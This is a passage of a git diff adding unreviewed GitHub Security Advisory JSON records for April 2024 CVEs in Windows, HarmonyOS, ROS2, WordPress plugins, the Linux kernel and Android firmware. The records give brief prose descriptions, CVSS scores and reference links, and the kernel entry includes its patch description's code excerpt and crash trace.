"affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28940" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28940" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xhgx-7r6h-x8hf/GHSA-xhgx-7r6h-x8hf.json b/advisories/unreviewed/2024/04/GHSA-xhgx-7r6h-x8hf/GHSA-xhgx-7r6h-x8hf.json new file mode 100644 index 00000000000..aebd621220b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xhgx-7r6h-x8hf/GHSA-xhgx-7r6h-x8hf.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhgx-7r6h-x8hf", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2023-52713" + ], + "details": "Vulnerability of improper permission control in the window management module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52713" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xhh7-pjwc-jm9m/GHSA-xhh7-pjwc-jm9m.json b/advisories/unreviewed/2024/04/GHSA-xhh7-pjwc-jm9m/GHSA-xhh7-pjwc-jm9m.json new file mode 100644 index 00000000000..2ca75a56062 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xhh7-pjwc-jm9m/GHSA-xhh7-pjwc-jm9m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhh7-pjwc-jm9m", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26227" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26227" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26227" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xj3v-fcjw-gv7p/GHSA-xj3v-fcjw-gv7p.json b/advisories/unreviewed/2024/04/GHSA-xj3v-fcjw-gv7p/GHSA-xj3v-fcjw-gv7p.json new file mode 100644 index 00000000000..879f47ee002 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xj3v-fcjw-gv7p/GHSA-xj3v-fcjw-gv7p.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj3v-fcjw-gv7p", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30679" + ], + "details": "An issue was discovered in the default configurations of ROS2 Iron Irwini ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows unauthenticated attackers to authenticate using default credentials.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30679" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30679" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xjcx-58p2-6mm5/GHSA-xjcx-58p2-6mm5.json b/advisories/unreviewed/2024/04/GHSA-xjcx-58p2-6mm5/GHSA-xjcx-58p2-6mm5.json new file mode 100644 index 00000000000..125e86393d1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xjcx-58p2-6mm5/GHSA-xjcx-58p2-6mm5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjcx-58p2-6mm5", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1464" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘style’ attribute of the Posts Slider widget in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1464" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3048237/addons-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ce6e40e-b090-447a-9bf9-6337d30e7da3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xjj5-mp7v-39hq/GHSA-xjj5-mp7v-39hq.json b/advisories/unreviewed/2024/04/GHSA-xjj5-mp7v-39hq/GHSA-xjj5-mp7v-39hq.json new file mode 100644 index 00000000000..a31707b7b29 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xjj5-mp7v-39hq/GHSA-xjj5-mp7v-39hq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjj5-mp7v-39hq", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52346" + ], + "details": "In modem driver, there is a possible system crash due to improper input validation. This could lead to local information disclosure with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52346" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xjx3-j32m-446r/GHSA-xjx3-j32m-446r.json b/advisories/unreviewed/2024/04/GHSA-xjx3-j32m-446r/GHSA-xjx3-j32m-446r.json new file mode 100644 index 00000000000..2a48d324fdb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xjx3-j32m-446r/GHSA-xjx3-j32m-446r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjx3-j32m-446r", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26189" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26189" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26189" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xp2j-75cr-2mjj/GHSA-xp2j-75cr-2mjj.json b/advisories/unreviewed/2024/04/GHSA-xp2j-75cr-2mjj/GHSA-xp2j-75cr-2mjj.json new file mode 100644 index 00000000000..880cb157aaf --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xp2j-75cr-2mjj/GHSA-xp2j-75cr-2mjj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp2j-75cr-2mjj", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2024-0376" + ], + "details": "The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Wrapper Link Widget in all versions up to, and including, 4.10.16 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0376" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9eb9cb-ead9-4ddf-b40b-a0ce2f4910f6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xqjq-j9cx-q953/GHSA-xqjq-j9cx-q953.json b/advisories/unreviewed/2024/04/GHSA-xqjq-j9cx-q953/GHSA-xqjq-j9cx-q953.json new file mode 100644 index 00000000000..1d747ee4580 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xqjq-j9cx-q953/GHSA-xqjq-j9cx-q953.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqjq-j9cx-q953", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30680" + ], + "details": "Shell injection vulnerability was discovered in ROS2 (Robot Operating System 2) Iron Irwini in versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code escalate privileges, and obtain sensitive information due to the way ROS2 handles shell command execution in components like command interpreters or interfaces that process external inputs.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30680" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30680" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xr98-c22v-cfcg/GHSA-xr98-c22v-cfcg.json b/advisories/unreviewed/2024/04/GHSA-xr98-c22v-cfcg/GHSA-xr98-c22v-cfcg.json new file mode 100644 index 00000000000..dc029efe4f1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xr98-c22v-cfcg/GHSA-xr98-c22v-cfcg.json @@ -0,0 +1,51 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xr98-c22v-cfcg", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26815" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: taprio: proper TCA_TAPRIO_TC_ENTRY_INDEX check\n\ntaprio_parse_tc_entry() is not correctly checking\nTCA_TAPRIO_TC_ENTRY_INDEX attribute:\n\n\tint tc; // Signed value\n\n\ttc = nla_get_u32(tb[TCA_TAPRIO_TC_ENTRY_INDEX]);\n\tif (tc >= TC_QOPT_MAX_QUEUE) {\n\t\tNL_SET_ERR_MSG_MOD(extack, \"TC entry index out of range\");\n\t\treturn -ERANGE;\n\t}\n\nsyzbot reported that it could fed arbitary negative values:\n\nUBSAN: shift-out-of-bounds in net/sched/sch_taprio.c:1722:18\nshift exponent -2147418108 is negative\nCPU: 0 PID: 5066 Comm: syz-executor367 Not tainted 6.8.0-rc7-syzkaller-00136-gc8a5c731fd12 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024\nCall Trace:\n \n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2e0 lib/dump_stack.c:106\n ubsan_epilogue lib/ubsan.c:217 [inline]\n __ubsan_handle_shift_out_of_bounds+0x3c7/0x420 lib/ubsan.c:386\n taprio_parse_tc_entry net/sched/sch_taprio.c:1722 [inline]\n taprio_parse_tc_entries net/sched/sch_taprio.c:1768 [inline]\n taprio_change+0xb87/0x57d0 net/sched/sch_taprio.c:1877\n taprio_init+0x9da/0xc80 net/sched/sch_taprio.c:2134\n qdisc_create+0x9d4/0x1190 net/sched/sch_api.c:1355\n tc_modify_qdisc+0xa26/0x1e40 net/sched/sch_api.c:1776\n rtnetlink_rcv_msg+0x885/0x1040 net/core/rtnetlink.c:6617\n netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543\n netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]\n netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367\n netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x221/0x270 net/socket.c:745\n ____sys_sendmsg+0x525/0x7d0 net/socket.c:2584\n ___sys_sendmsg net/socket.c:2638 [inline]\n __sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667\n do_syscall_64+0xf9/0x240\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\nRIP: 0033:0x7f1b2dea3759\nCode: 48 83 c4 28 c3 e8 d7 19 00 00 0f 1f 80 00 00 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffd4de452f8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00007f1b2def0390 RCX: 00007f1b2dea3759\nRDX: 0000000000000000 RSI: 00000000200007c0 RDI: 0000000000000004\nRBP: 0000000000000003 R08: 0000555500000000 R09: 0000555500000000\nR10: 0000555500000000 R11: 0000000000000246 R12: 00007ffd4de45340\nR13: 00007ffd4de45310 R14: 0000000000000001 R15: 00007ffd4de45340", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26815" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/343041b59b7810f9cdca371f445dd43b35c740b1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6915b1b28fe57e92c78e664366dc61c4f15ff03b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/860e838fb089d652a446ced52cbdf051285b68e7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9b720bb1a69a9f12a4a5c86b6f89386fe05ed0f2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bd2474a45df7c11412c2587de3d4e43760531418" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T11:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xwrr-gvqm-j58v/GHSA-xwrr-gvqm-j58v.json b/advisories/unreviewed/2024/04/GHSA-xwrr-gvqm-j58v/GHSA-xwrr-gvqm-j58v.json new file mode 100644 index 00000000000..0dca4407ec6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xwrr-gvqm-j58v/GHSA-xwrr-gvqm-j58v.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwrr-gvqm-j58v", + "modified": "2024-04-05T21:32:43Z", + "published": "2024-04-05T21:32:43Z", + "aliases": [ + "CVE-2024-29741" + ], + "details": "In pblS2mpuResume of s2mpu.c, there is a possible mitigation bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29741" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xx2r-2w7h-qwpc/GHSA-xx2r-2w7h-qwpc.json b/advisories/unreviewed/2024/04/GHSA-xx2r-2w7h-qwpc/GHSA-xx2r-2w7h-qwpc.json new file mode 100644 index 00000000000..6c17aaa6673 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xx2r-2w7h-qwpc/GHSA-xx2r-2w7h-qwpc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xx2r-2w7h-qwpc", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-21323" + ], + "details": "Microsoft Defender for IoT Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21323" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21323" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-36" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:34Z" + } +} \ No newline at end of file